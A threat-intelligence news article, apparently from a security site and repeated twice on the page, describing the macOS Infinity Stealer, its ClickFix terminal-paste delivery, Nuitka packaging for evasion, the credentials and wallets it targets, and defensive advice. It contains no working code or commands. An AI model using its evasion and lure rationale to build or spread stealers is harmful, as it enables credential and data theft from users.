New Infinity Stealer Malware Grabs macOS Data via ClickFix Lures

A new macOS-targeting information stealer called Infinity Stealer has been identified targeting Apple users via the increasingly prevalent ClickFix social engineering technique. The malware is written in Python and compiled into a standalone executable using the open-source Nuitka compiler, making it harder to detect and analyse through traditional methods.

What Is Infinity Stealer

Infinity Stealer is a newly discovered info-stealer malware designed specifically to target macOS systems. Its primary objective is to harvest sensitive data from compromised machines — including browser credentials, cookies, cryptocurrency wallet data, and other personal information — and exfiltrate it to attacker-controlled infrastructure.

Key technical characteristics:

Language: Python (compiled to a native executable via Nuitka)
Target Platform: macOS
Delivery Method: ClickFix social engineering lures
Packaging: Nuitka-compiled standalone binary (disguises Python origin, complicates reverse engineering)
Category: Info-stealer / credential harvester

The ClickFix Delivery Mechanism

ClickFix is a social engineering technique that has surged in popularity among threat actors across multiple malware campaigns. The lure presents victims with a fake browser error or warning, instructing them to:

Copy a command from the page
Open a terminal or run dialog
Paste and execute the command — which silently installs malware

In the Infinity Stealer campaign, the ClickFix lure is tailored for macOS users, directing victims to open Terminal and run a command that downloads and executes the Nuitka-compiled Python payload. The lure is designed to appear as a legitimate browser fix or update instruction, exploiting user trust in browser security prompts.

Common ClickFix lure themes observed across campaigns include:

Fake "browser update required" warnings
Fake CAPTCHA verification failures
Fake software activation or font installation prompts
Impersonated cloud service error pages

Nuitka Packaging — Why It Matters

The use of Nuitka to compile the Python payload into a standalone macOS executable is a deliberate evasion technique:

Detection evasion: Nuitka-compiled binaries do not present as Python scripts and may bypass security tools that scan for .py files or common Python malware patterns
Analysis friction: Compiled binaries are harder to reverse-engineer than raw Python scripts, slowing down incident response and threat intelligence efforts
Standalone deployment: No Python runtime needs to be installed on the victim machine — the executable runs natively, broadening the target population

This packaging approach is consistent with a trend of threat actors using legitimate compilation tools (PyInstaller, cx_Freeze, Nuitka) to harden Python malware against detection.

What Infinity Stealer Targets

Based on the malware's classification as an info-stealer, typical data targets for this category include:

Browser credentials: Saved passwords, autofill data, and session cookies from Safari, Chrome, Firefox, and Brave
Cryptocurrency wallets: Wallet files and seed phrases from popular macOS-compatible crypto wallet applications
macOS Keychain: Stored passwords, certificates, and secure notes (where accessible)
Application tokens: API keys and tokens stored in app configuration files
Documents and files: Targeted file types (PDFs, spreadsheets, credential files) from common locations

Why macOS Targets Are Increasingly Valuable

The shift toward macOS-targeting malware reflects the changing threat landscape:

Enterprise adoption: macOS has grown significantly in corporate environments, making it a higher-value target for credential theft
Developer machines: Developers on macOS often hold cloud credentials, SSH keys, and access to internal systems — extremely valuable for attackers
Perceived lower risk: Historical assumptions that macOS is less targeted mean some users and organisations apply less rigorous security controls

ClickFix's Rise as a Primary Delivery Vector

ClickFix has emerged as one of the most effective social engineering techniques of 2025-2026. Its effectiveness stems from:

Psychological manipulation: Convincing users they are solving a legitimate technical problem
Direct execution: Bypasses browser download warnings and Gatekeeper prompts by having the user manually execute the payload
Platform agnostic: Works on Windows, macOS, and Linux by adapting the terminal instructions
Low technical barrier: Requires no exploit — relies entirely on user action

Multiple threat groups and malware families have adopted ClickFix as their primary delivery mechanism, including campaigns distributing AsyncRAT, DarkGate, Lumma Stealer, and now Infinity Stealer.

Recommendations for macOS Users

Never run terminal commands from websites: Legitimate browser updates and fixes are never delivered via copy-paste terminal instructions
Be sceptical of browser error popups: Verify any error messages through official browser support channels before acting
Enable Gatekeeper and XProtect: Ensure macOS security features are active and up to date
Use an endpoint security solution: Install a reputable macOS AV/EDR product that can detect behavioural indicators of stealers
Monitor for unusual Terminal activity: Unexpected Terminal processes or outbound connections after a browser warning are red flags
Audit browser saved passwords: Consider a password manager with breach monitoring rather than browser-native password storage

Key Takeaways

Infinity Stealer is a new macOS info-stealer delivered via ClickFix social engineering lures
The malware is written in Python and packaged using Nuitka to evade detection and complicate analysis
ClickFix continues to be a highly effective delivery mechanism — macOS users should treat any browser pop-up instructing terminal command execution with extreme suspicion
The targeting of macOS reflects a broader trend of threat actors expanding beyond Windows to reach high-value developer and enterprise Apple users
This campaign follows a well-established pattern: ClickFix lure → user-executed terminal command → payload download → stealer execution → data exfiltration

Source: BleepingComputer

What Is Infinity Stealer

Key technical characteristics:

Language: Python (compiled to a native executable via Nuitka)
Target Platform: macOS
Delivery Method: ClickFix social engineering lures
Packaging: Nuitka-compiled standalone binary (disguises Python origin, complicates reverse engineering)
Category: Info-stealer / credential harvester

The ClickFix Delivery Mechanism

Copy a command from the page
Open a terminal or run dialog
Paste and execute the command — which silently installs malware

Common ClickFix lure themes observed across campaigns include:

Fake "browser update required" warnings
Fake CAPTCHA verification failures
Fake software activation or font installation prompts
Impersonated cloud service error pages

Nuitka Packaging — Why It Matters

The use of Nuitka to compile the Python payload into a standalone macOS executable is a deliberate evasion technique:

Detection evasion: Nuitka-compiled binaries do not present as Python scripts and may bypass security tools that scan for .py files or common Python malware patterns
Analysis friction: Compiled binaries are harder to reverse-engineer than raw Python scripts, slowing down incident response and threat intelligence efforts
Standalone deployment: No Python runtime needs to be installed on the victim machine — the executable runs natively, broadening the target population

This packaging approach is consistent with a trend of threat actors using legitimate compilation tools (PyInstaller, cx_Freeze, Nuitka) to harden Python malware against detection.

What Infinity Stealer Targets

Based on the malware's classification as an info-stealer, typical data targets for this category include:

Browser credentials: Saved passwords, autofill data, and session cookies from Safari, Chrome, Firefox, and Brave
Cryptocurrency wallets: Wallet files and seed phrases from popular macOS-compatible crypto wallet applications
macOS Keychain: Stored passwords, certificates, and secure notes (where accessible)
Application tokens: API keys and tokens stored in app configuration files
Documents and files: Targeted file types (PDFs, spreadsheets, credential files) from common locations

Why macOS Targets Are Increasingly Valuable

The shift toward macOS-targeting malware reflects the changing threat landscape:

Enterprise adoption: macOS has grown significantly in corporate environments, making it a higher-value target for credential theft
Developer machines: Developers on macOS often hold cloud credentials, SSH keys, and access to internal systems — extremely valuable for attackers
Perceived lower risk: Historical assumptions that macOS is less targeted mean some users and organisations apply less rigorous security controls

ClickFix's Rise as a Primary Delivery Vector

ClickFix has emerged as one of the most effective social engineering techniques of 2025-2026. Its effectiveness stems from:

Psychological manipulation: Convincing users they are solving a legitimate technical problem
Direct execution: Bypasses browser download warnings and Gatekeeper prompts by having the user manually execute the payload
Platform agnostic: Works on Windows, macOS, and Linux by adapting the terminal instructions
Low technical barrier: Requires no exploit — relies entirely on user action

Multiple threat groups and malware families have adopted ClickFix as their primary delivery mechanism, including campaigns distributing AsyncRAT, DarkGate, Lumma Stealer, and now Infinity Stealer.

Recommendations for macOS Users

Never run terminal commands from websites: Legitimate browser updates and fixes are never delivered via copy-paste terminal instructions
Be sceptical of browser error popups: Verify any error messages through official browser support channels before acting
Enable Gatekeeper and XProtect: Ensure macOS security features are active and up to date
Use an endpoint security solution: Install a reputable macOS AV/EDR product that can detect behavioural indicators of stealers
Monitor for unusual Terminal activity: Unexpected Terminal processes or outbound connections after a browser warning are red flags
Audit browser saved passwords: Consider a password manager with breach monitoring rather than browser-native password storage

Key Takeaways

Infinity Stealer is a new macOS info-stealer delivered via ClickFix social engineering lures
The malware is written in Python and packaged using Nuitka to evade detection and complicate analysis
ClickFix continues to be a highly effective delivery mechanism — macOS users should treat any browser pop-up instructing terminal command execution with extreme suspicion
The targeting of macOS reflects a broader trend of threat actors expanding beyond Windows to reach high-value developer and enterprise Apple users
This campaign follows a well-established pattern: ClickFix lure → user-executed terminal command → payload download → stealer execution → data exfiltration

Source: BleepingComputer

New Infinity Stealer Malware Grabs macOS Data via ClickFix Lures

What Is Infinity Stealer

The ClickFix Delivery Mechanism

Nuitka Packaging — Why It Matters

What Infinity Stealer Targets

Why macOS Targets Are Increasingly Valuable

ClickFix's Rise as a Primary Delivery Vector

Recommendations for macOS Users

Key Takeaways

Backdoored Telnyx PyPI Package Pushes Malware Hidden in WAV Audio

Cloudflare-Themed ClickFix Attack Drops Infiniti Stealer on Macs

Claude AI Artifacts Abused to Distribute macOS Infostealer

New Infinity Stealer Malware Grabs macOS Data via ClickFix Lures

What Is Infinity Stealer

The ClickFix Delivery Mechanism

Nuitka Packaging — Why It Matters

What Infinity Stealer Targets

Why macOS Targets Are Increasingly Valuable

ClickFix's Rise as a Primary Delivery Vector

Recommendations for macOS Users

Key Takeaways

Backdoored Telnyx PyPI Package Pushes Malware Hidden in WAV Audio

Cloudflare-Themed ClickFix Attack Drops Infiniti Stealer on Macs

Claude AI Artifacts Abused to Distribute macOS Infostealer